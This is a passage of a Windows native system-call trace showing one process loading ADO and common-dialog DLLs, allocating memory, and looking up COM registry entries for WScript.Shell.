 02565   456   NtClose  (346, ... ) == 0x0
 02566   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Program Files\Common Files\System\ado\msado15.dll"}, 1234876, ... ) }, 1234876, ... ) == 0x0
 02567   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\Common Files\System\ado\msado15.dll"}, 5, 96, ... 344, {status=0x0, info=1}, ) }, 5, 96, ... 344, {status=0x0, info=1}, ) == 0x0
 02568   456   NtCreateSection  (0xe, 0x0, 0x0, 16, 134217728, 344, ... 348, ) == 0x0
 02569   456   NtClose  (344, ... ) == 0x0
 02570   456   NtMapViewOfSection  (348, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0xda0000), 0x0, 487424, ) == 0x0
 02571   456   NtClose  (348, ... ) == 0x0
 02572   456   NtUnmapViewOfSection  (-1, 0xda0000, ... ) == 0x0
 02573   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Program Files\Common Files\System\ado\msado15.dll"}, 1235192, ... ) }, 1235192, ... ) == 0x0
 02574   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Program Files\Common Files\System\ado\msado15.dll"}, 1235192, ... ) }, 1235192, ... ) == 0x0
 02575   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\Program Files\Common Files\System\ado\msado15.dll"}, 5, 96, ... 348, {status=0x0, info=1}, ) }, 5, 96, ... 348, {status=0x0, info=1}, ) == 0x0
 02576   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 348, ... 344, ) == 0x0
 02577   456   NtQuerySection  (344, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 02578   456   NtClose  (348, ... ) == 0x0
 02579   456   NtMapViewOfSection  (344, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x1f430000), 0x0, 487424, ) == 0x0
 02580   456   NtClose  (344, ... ) == 0x0
 02581   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "MSDART.DLL"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02582   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\Program Files\Common Files\System\ado\MSDART.DLL"}, 1234380, ... ) }, 1234380, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02583   456   NtQueryAttributesFile  ({24, 112, 0x40, 0, 0,  ({24, 112, 0x40, 0, 0, "MSDART.DLL"}, 1234380, ... ) }, 1234380, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02584   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\MSDART.DLL"}, 1234380, ... ) }, 1234380, ... ) == 0x0
 02585   456   NtOpenFile  (0x100020, {24, 0, 0x40, 0, 0,  (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\System32\MSDART.DLL"}, 5, 96, ... 344, {status=0x0, info=1}, ) }, 5, 96, ... 344, {status=0x0, info=1}, ) == 0x0
 02586   456   NtCreateSection  (0xf, 0x0, 0x0, 16, 16777216, 344, ... 348, ) == 0x0
 02587   456   NtQuerySection  (348, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0
 02588   456   NtClose  (344, ... ) == 0x0
 02589   456   NtMapViewOfSection  (348, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x74c50000), 0x0, 126976, ) == 0x0
 02590   456   NtClose  (348, ... ) == 0x0
 02591   456   NtProtectVirtualMemory  (-1, (0x74c51000), 1044, 4, ... (0x74c51000), 4096, 32, ) == 0x0
 02592   456   NtProtectVirtualMemory  (-1, (0x74c51000), 4096, 32, ... (0x74c51000), 4096, 4, ) == 0x0
 02593   456   NtFlushInstructionCache  (-1, 1959071744, 1044, ... ) == 0x0
 02594   456   NtOpenSection  (0xe, {24, 8, 0x40, 0, 0,  (0xe, {24, 8, 0x40, 0, 0, "comdlg32.dll"}, ... 348, ) }, ... 348, ) == 0x0
 02595   456   NtMapViewOfSection  (348, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x763b0000), 0x0, 282624, ) == 0x0
 02596   456   NtClose  (348, ... ) == 0x0
 02597   456   NtProtectVirtualMemory  (-1, (0x763b1000), 1536, 4, ... (0x763b1000), 4096, 32, ) == 0x0
 02598   456   NtProtectVirtualMemory  (-1, (0x763b1000), 4096, 32, ... (0x763b1000), 4096, 4, ) == 0x0
 02599   456   NtFlushInstructionCache  (-1, 1983582208, 1536, ... ) == 0x0
 02600   456   NtUserRegisterWindowMessage  ( ("WOWLFChange", ... ) , ... ) == 0xc06b
 02601   456   NtUserRegisterWindowMessage  ( ("WOWDirChange", ... ) , ... ) == 0xc06c
 02602   456   NtUserRegisterWindowMessage  ( ("WOWCHOOSEFONT_GETLOGFONT", ... ) , ... ) == 0xc06d
 02603   456   NtUserRegisterWindowMessage  ( ("commdlg_LBSelChangedNotify", ... ) , ... ) == 0xc06e
 02604   456   NtUserRegisterWindowMessage  ( ("commdlg_ShareViolation", ... ) , ... ) == 0xc06f
 02605   456   NtUserRegisterWindowMessage  ( ("commdlg_FileNameOK", ... ) , ... ) == 0xc070
 02606   456   NtUserRegisterWindowMessage  ( ("commdlg_ColorOK", ... ) , ... ) == 0xc071
 02607   456   NtUserRegisterWindowMessage  ( ("commdlg_SetRGBColor", ... ) , ... ) == 0xc072
 02608   456   NtUserRegisterWindowMessage  ( ("commdlg_LBSelChangedNotify", ... ) , ... ) == 0xc06e
 02609   456   NtUserRegisterWindowMessage  ( ("commdlg_ShareViolation", ... ) , ... ) == 0xc06f
 02610   456   NtUserRegisterWindowMessage  ( ("commdlg_FileNameOK", ... ) , ... ) == 0xc070
 02611   456   NtUserRegisterWindowMessage  ( ("commdlg_ColorOK", ... ) , ... ) == 0xc071
 02612   456   NtUserRegisterWindowMessage  ( ("commdlg_SetRGBColor", ... ) , ... ) == 0xc072
 02613   456   NtUserRegisterWindowMessage  ( ("Shell IDList Array", ... ) , ... ) == 0xc073
 02614   456   NtUserRegisterWindowMessage  ( ("commdlg_help", ... ) , ... ) == 0xc074
 02615   456   NtUserRegisterWindowMessage  ( ("commdlg_help", ... ) , ... ) == 0xc074
 02616   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02617   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 02618   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "SOFTWARE\Microsoft\DataAccess"}, ... 348, ) }, ... 348, ) == 0x0
 02619   456   NtQueryValueKey  (348,  (348, "UseMPHeap", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02620   456   NtQueryValueKey  (348,  (348, "NumberOfHeaps", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02621   456   NtQueryValueKey  (348,  (348, "DepOfLookAsideBuf", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02622   456   NtQueryValueKey  (348,  (348, "NumberOfCsPools", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02623   456   NtClose  (348, ... ) == 0x0
 02624   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02625   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 02626   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "SOFTWARE"}, ... 348, ) }, ... 348, ) == 0x0
 02627   456   NtClose  (348, ... ) == 0x0
 02628   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02629   456   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 14286848, 262144, ) == 0x0
 02630   456   NtAllocateVirtualMemory  (-1, 14286848, 0, 4096, 4096, 4, ... 14286848, 4096, ) == 0x0
 02631   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02632   456   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 14548992, 262144, ) == 0x0
 02633   456   NtAllocateVirtualMemory  (-1, 14548992, 0, 4096, 4096, 4, ... 14548992, 4096, ) == 0x0
 02634   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02635   456   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 14811136, 262144, ) == 0x0
 02636   456   NtAllocateVirtualMemory  (-1, 14811136, 0, 4096, 4096, 4, ... 14811136, 4096, ) == 0x0
 02637   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02638   456   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 15073280, 262144, ) == 0x0
 02639   456   NtAllocateVirtualMemory  (-1, 15073280, 0, 4096, 4096, 4, ... 15073280, 4096, ) == 0x0
 02640   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02641   456   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 15335424, 262144, ) == 0x0
 02642   456   NtAllocateVirtualMemory  (-1, 15335424, 0, 4096, 4096, 4, ... 15335424, 4096, ) == 0x0
 02643   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02644   456   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 15597568, 262144, ) == 0x0
 02645   456   NtAllocateVirtualMemory  (-1, 15597568, 0, 4096, 4096, 4, ... 15597568, 4096, ) == 0x0
 02646   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02647   456   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 15859712, 262144, ) == 0x0
 02648   456   NtAllocateVirtualMemory  (-1, 15859712, 0, 4096, 4096, 4, ... 15859712, 4096, ) == 0x0
 02649   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02650   456   NtAllocateVirtualMemory  (-1, 0, 0, 262144, 8192, 4, ... 16121856, 262144, ) == 0x0
 02651   456   NtAllocateVirtualMemory  (-1, 16121856, 0, 4096, 4096, 4, ... 16121856, 4096, ) == 0x0
 02652   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "SOFTWARE\Microsoft\DataAccess"}, ... 348, ) }, ... 348, ) == 0x0
 02653   456   NtQueryValueKey  (348,  (348, "FXMemEnabled", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02654   456   NtClose  (348, ... ) == 0x0
 02655   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02656   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 02657   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02658   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 02659   456   NtQuerySystemInformation  (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0
 02660   456   NtQuerySystemInformation  (Processor, 12, ... {system info, class 1, size 12}, 0x0, ) == 0x0
 02661   456   NtAllocateVirtualMemory  (-1, 0, 0, 524280, 8192, 4, ... 16384000, 524288, ) == 0x0
 02662   456   NtAllocateVirtualMemory  (-1, 16384000, 0, 4096, 4096, 4, ... 16384000, 4096, ) == 0x0
 02663   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02664   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 348, ) }, ... 348, ) == 0x0
 02665   456   NtQueryValueKey  (348,  (348, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (348, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02666   456   NtClose  (348, ... ) == 0x0
 02667   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES"}, 138, ) }, 138, ) == 0x0
 02668   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "WScript.Shell"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02669   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\WScript.Shell"}, ... 348, ) }, ... 348, ) == 0x0
 02670   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\WScript.Shell"}, 100, ) }, 100, ) == 0x0
 02671   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02672   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02673   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02674   456   NtClose  (344, ... ) == 0x0
 02675   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\WScript.Shell\CLSID"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02676   456   NtOpenKey  (0x1, {24, 350, 0x40, 0, 0,  (0x1, {24, 350, 0x40, 0, 0, "CLSID"}, ... 344, ) }, ... 344, ) == 0x0
 02677   456   NtQueryKey  (346, Name, 392, ... {Name= (346, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\WScript.Shell\CLSID"}, 112, ) }, 112, ) == 0x0
 02678   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02679   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 352, ) == 0x0
 02680   456   NtQueryInformationToken  (352, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02681   456   NtClose  (352, ... ) == 0x0
 02682   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\WScript.Shell\CLSID"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02683   456   NtQueryValueKey  (346, 0x0, Partial, 144, ... TitleIdx=0, Type=1, Data= (346, 0x0, Partial, 144, ... TitleIdx=0, Type=1, Data="{\07\02\0C\02\04\0D\0D\05\0-\0D\07\00\0A\0-\04\03\08\0B\0-\08\0A\04\02\0-\09\08\04\02\04\0B\08\08\0A\0F\0B\08\0}\0\0\0"}, 90, ) }, 90, ) == 0x0
 02684   456   NtClose  (346, ... ) == 0x0
 02685   456   NtClose  (350, ... ) == 0x0
 02686   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02687   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 348, ) }, ... 348, ) == 0x0
 02688   456   NtQueryValueKey  (348,  (348, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (348, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02689   456   NtClose  (348, ... ) == 0x0
 02690   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02691   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 348, ) }, ... 348, ) == 0x0
 02692   456   NtQueryValueKey  (348,  (348, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (348, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02693   456   NtClose  (348, ... ) == 0x0
 02694   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02695   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02696   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... 348, ) }, ... 348, ) == 0x0
 02697   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}B"}, 162, ) }, 162, ) == 0x0
 02698   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02699   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02700   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02701   456   NtClose  (344, ... ) == 0x0
 02702   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02703   456   NtOpenKey  (0x1, {24, 350, 0x40, 0, 0,  (0x1, {24, 350, 0x40, 0, 0, "TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02704   456   NtClose  (350, ... ) == 0x0
 02705   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02706   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 348, ) }, ... 348, ) == 0x0
 02707   456   NtQueryValueKey  (348,  (348, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (348, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02708   456   NtClose  (348, ... ) == 0x0
 02709   456   NtOpenSection  (0x4, {24, 64, 0x2, 0, 0,  (0x4, {24, 64, 0x2, 0, 0, "Global\ComPlusCOMRegTable"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02710   456   NtOpenKey  (0x20019, {24, 48, 0x40, 0, 0,  (0x20019, {24, 48, 0x40, 0, 0, "Software\Microsoft\COM3"}, ... 348, ) }, ... 348, ) == 0x0
 02711   456   NtQueryValueKey  (348,  (348, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) , Partial, 144, ... TitleIdx=0, Type=3, Data= (348, "REGDBVersion", Partial, 144, ... TitleIdx=0, Type=3, Data="\7\0\0\0\0\0\0\0"}, 20, ) }, 20, ) == 0x0
 02712   456   NtClose  (348, ... ) == 0x0
 02713   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02714   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02715   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... 348, ) }, ... 348, ) == 0x0
 02716   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}B"}, 162, ) }, 162, ) == 0x0
 02717   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02718   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02719   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02720   456   NtClose  (344, ... ) == 0x0
 02721   456   NtOpenKey  (0x1, {24, 0, 0x40, 0, 0,  (0x1, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02722   456   NtOpenKey  (0x1, {24, 350, 0x40, 0, 0,  (0x1, {24, 350, 0x40, 0, 0, "TreatAs"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02723   456   NtClose  (350, ... ) == 0x0
 02724   456   NtQueryKey  (90, Name, 384, ... {Name= (90, Name, 384, ... {Name="\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_CLASSES9"}, 138, ) }, 138, ) == 0x0
 02725   456   NtOpenKey  (0x20019, {24, 90, 0x40, 0, 0,  (0x20019, {24, 90, 0x40, 0, 0, "CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02726   456   NtOpenKey  (0x20019, {24, 0, 0x40, 0, 0,  (0x20019, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}"}, ... 348, ) }, ... 348, ) == 0x0
 02727   456   NtQueryKey  (350, Name, 384, ... {Name= (350, Name, 384, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}B"}, 162, ) }, 162, ) == 0x0
 02728   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02729   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 344, ) == 0x0
 02730   456   NtQueryInformationToken  (344, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02731   456   NtClose  (344, ... ) == 0x0
 02732   456   NtOpenKey  (0x2000000, {24, 0, 0x40, 0, 0,  (0x2000000, {24, 0, 0x40, 0, 0, "\REGISTRY\USER\S-1-5-21-1078081533-484763869-839522115-1003_Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InprocServer32"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02733   456   NtOpenKey  (0x2000000, {24, 350, 0x40, 0, 0,  (0x2000000, {24, 350, 0x40, 0, 0, "InprocServer32"}, ... 344, ) }, ... 344, ) == 0x0
 02734   456   NtQueryKey  (346, Name, 392, ... {Name= (346, Name, 392, ... {Name="\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32"}, 192, ) }, 192, ) == 0x0
 02735   456   NtOpenThreadTokenEx  (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN
 02736   456   NtOpenProcessTokenEx  (-1, 0x20008, 512, ... 352, ) == 0x0
 02737   456   NtQueryInformationToken  (352, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0
 02738   456   NtClose  (352, ... ) == 0x0
